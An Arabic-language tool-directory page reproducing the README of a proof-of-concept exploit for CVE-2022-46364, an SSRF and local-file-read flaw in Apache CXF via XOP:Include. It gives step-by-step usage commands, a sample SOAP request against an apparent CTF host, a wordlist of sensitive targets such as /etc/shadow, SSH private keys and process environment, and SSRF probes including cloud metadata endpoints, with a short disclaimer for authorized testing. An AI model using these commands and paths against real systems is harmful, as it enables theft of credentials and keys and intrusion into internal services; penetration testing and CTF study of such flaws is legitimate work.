Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46364-poc — CVE-2022-46364 Apache CXF XOP:Include SSRF / LFI | Kitploit
أدوات/GitHubGitHub/0xmid00/cve-2022-46364-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائياختبار الاختراق
GitHub0xmid00/cve-2022-46364-poc

CVE-2022-46364-poc

CVE-2022-46364 Apache CXF XOP:Include SSRF / LFI

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46364 — ثغرة SSRF / LFI في Apache CXF عبر XOP:Include

المؤلف: 0xmid00
نوع الثغرة: SSRF / قراءة ملفات محلية عبر XOP:Include في طلبات MTOM
المتأثر: Apache CXF < 3.5.5 و < 3.4.10


ما هي الثغرة؟

يقوم Apache CXF بمعالجة رسائل MTOM (آلية تحسين نقل الرسائل) التي تحتوي على عناصر XOP:Include. من المفترض أن تشير السمة href في XOP:Include إلى مرفق داخل نفس رسالة MTOM متعددة الأجزاء.

ومع ذلك، في الإصدارات الضعيفة، يقوم CXF بتتبع أي URI يتم توفيره في href، بما في ذلك:

  • file:///etc/passwd → قراءة الملفات المحلية (LFI)
  • http://127.0.0.1:PORT/ → فحص الخدمات الداخلية (SSRF)

يكفي أن يرسل المهاجم طلب SOAP مع معلمة واحدة على الأقل من أي نوع لاستغلال هذه الثغرة.


المتطلبات

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 exploit.py -r request.txt [options]

الوسائط


تنسيق ملف الطلب

احفظ طلب HTTP الخام في ملف .txt تماماً كما هو مأخوذ (مثلاً من Burp):

root@kitploit:~
POST /employeeservice HTTP/1.1
Host: devarea.htb:8080
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Connection: close
Content-Length: 487

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:tns="http://devarea.htb/">
  <soapenv:Body>
    <tns:submitReport>
      <arg0>
        <confidential>false</confidential>
        <content>test</content>
        <department>IT</department>
        <employeeName>john</employeeName>
      </arg0>
    </tns:submitReport>
  </soapenv:Body>
</soapenv:Envelope>

تقوم الأداة تلقائياً بتحويل الطلب إلى تنسيق MTOM — لست بحاجة للقيام بذلك يدوياً.


أمثلة

الوضع 1 — الكشف التلقائي عن جميع الحقول القابلة للحقن

root@kitploit:~
python3 exploit.py -r request.txt --mode 1

يحاول حقن file:///etc/passwd في كل عنصر XML طرفي ويبلغ عن أي منها يعيد محتوى الملف.


الوضع 1 — اختبار حقل محدد

root@kitploit:~
python3 exploit.py -r request.txt --mode 1 --field content

الوضع 2 — تجربة الملفات (يكتشف الحقل أولاً)

root@kitploit:~
python3 exploit.py -r request.txt --mode 2 --wordlist lfi.txt

يقوم أولاً بتشغيل الوضع 1 للعثور على الحقل القابل للحقن، ثم يجرب جميع المسارات في قائمة الكلمات من خلال ذلك الحقل.


الوضع 2 — تجربة الملفات مع حقل معروف (الأسرع)

root@kitploit:~
python3 exploit.py -r request.txt --mode 2 --field content --wordlist lfi.txt

يتجاوز اكتشاف الحقل ويذهب مباشرة إلى التجربة.


قراءة ملف واحد

root@kitploit:~
python3 exploit.py -r request.txt --field content --read /home/dev_ryan/.ssh/id_rsa

مثال على قائمة كلمات (lfi.txt)

root@kitploit:~
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/self/cmdline
/home/dev_ryan/.ssh/id_rsa
/home/dev_ryan/.bash_history
/home/dev_ryan/.bashrc
/root/.ssh/id_rsa
/root/.bash_history
/var/log/auth.log
/var/log/syslog

يمكنك أيضاً استخدام SecLists:

root@kitploit:~
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

كيف يعمل

  1. يقوم بتحليل ملف طلب HTTP الخام
  2. يحدد حقل XML المستهدف في جسم SOAP
  3. يستبدل محتواه بـ <xop:Include href="file:///..."/>
  4. يلف الطلب بتنسيق MTOM متعدد الأجزاء (مطلوب لتفعيل معالج XOP في CXF)
  5. يرسل الطلب — يقوم CXF بجلب الملف وإرجاع محتواه مشفراً بـ base64
  6. يفك التشفير ويطبع النتيجة

وضع SSRF

لاستكشاف خدمات HTTP الداخلية بدلاً من قراءة الملفات:

root@kitploit:~
python3 exploit.py -r request.txt --field content --read http://127.0.0.1:8080/

أو قم بتعديل قيمة --read بأي عنوان URL داخلي:

root@kitploit:~
--read http://169.254.169.254/latest/meta-data/   (بيانات AWS الوصفية)
--read http://127.0.0.1:3306/                      (MySQL)
--read http://127.0.0.1:22/                        (شعار SSH)

إخلاء مسؤولية

هذه الأداة مخصصة فقط لاختبار الاختراق المصرح به وتحديات CTF. المؤلف غير مسؤول عن أي استخدام غير لائق.

تنزيل الأداة
الوسيطالوصف
-r, --requestمسار ملف طلب HTTP الخام (مطلوب)
--mode 1الكشف التلقائي عن الحقول القابلة للحقن باستخدام /etc/passwd
--mode 2تجربة قائمة كلمات من مسارات الملفات
--field NAMEتحديد حقل XML للحقن (يتجاوز الكشف التلقائي)
--wordlist PATHمسار قائمة كلمات الملفات للوضع 2
--read PATHقراءة ملف واحد محدد
-v, --verboseعرض معلومات مفصلة عن الطلب